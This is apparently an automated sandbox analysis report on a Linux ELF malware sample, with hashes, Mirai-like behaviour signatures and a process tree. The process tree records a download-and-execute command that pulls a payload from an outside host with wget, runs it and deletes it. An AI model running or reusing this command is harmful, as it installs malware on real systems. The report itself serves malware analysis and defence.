Analysis

  • max time kernel
    146s
  • max time network
    140s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    02/04/2024, 01:17

General

  • Target

    a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf

  • Size

    114KB

  • MD5

    535e42bda70b4c58e32e5f244ee715f1

  • SHA1

    70150ad2d0028bf5fbac7781aa18665102b6070e

  • SHA256

    a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf

  • SHA512

    1d907628b4333ca1e653fc7e73e6ecbb5cb2307bb060169b4fcee62e9e6d5c171101e93d3afeea9deafd3bea1820c3b3d1c78317d7e0acb49b415c4a5b2e62cf

  • SSDEEP

    3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJioud2yd1m7FnVqfJXoebNb:SKo/O8qtUbKXbm7FnVqfJXoebNb

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
    /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:1458
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
        PID:1459
        • /usr/bin/wget
          wget -q http://gay.energy/.../vivid -O .....
          3⤵
          • Writes file to tmp directory
          PID:1466
        • /usr/bin/chmod
          chmod 777 .....
          3⤵
            PID:1481
          • /tmp/.....
            ./.....
            3⤵
            • Executes dropped EXE
            PID:1482
          • /bin/sh
            /bin/sh ./.....
            3⤵
              PID:1482
            • /usr/bin/rm
              rm -rf .....
              3⤵
                PID:1485

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads